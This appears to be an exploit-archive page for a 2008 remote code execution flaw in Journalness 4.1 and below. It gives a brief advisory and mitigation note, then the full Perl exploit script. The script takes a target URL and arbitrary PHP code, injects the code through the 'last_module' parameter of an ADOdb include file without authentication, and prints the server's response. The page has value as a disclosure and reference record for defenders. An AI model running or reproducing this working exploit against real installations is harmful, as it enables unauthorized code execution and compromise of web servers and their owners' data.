Journalness - exploit.company

vendor:

Journalness

by:

Iron

8.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Journalness

Affected Version From: 4.1 and below

Affected Version To: 4.1 and below

Patch Exists: YES

Related CWE: N/A

CPE: a:journalness:journalness

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Journalness <= 4.1 Remote Code Execution exploit

This exploit allows remote attackers to execute arbitrary code on vulnerable installations of Journalness. Authentication is not required to exploit this vulnerability. The vulnerability is due to the 'includes/database/adodb-perf-module.inc.php' script not properly sanitizing user-supplied input to the 'last_module' parameter. An attacker can exploit this vulnerability to execute arbitrary code under the context of the webserver process.

Mitigation:

Upgrade to the latest version of Journalness or apply the patch from the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#	Vendor url: journalness.sourceforge.net
#
# note: exploit requires Register_globals = On in php.ini
#							~Iron
#							http://www.randombase.com
require LWP::UserAgent;

print "#
# Journalness <= 4.1 Remote Code Execution exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group & dHack
#
# Example target url: http://www.target.com/journalnessdir/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
	$target = "http://".$target;
}
if($target !~ /\/$/)
{
	$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "includes/database/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};".$code."//";

$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;

$response = $ua->get($target);

if ($response->is_success)
{
	print "\n"."#" x 20 ."\n";
	print $response->content;
	print "\n"."#" x 20 ."\n";
}
else
{
 die "Error: ".$response->status_line;
}

# milw0rm.com [2008-02-09]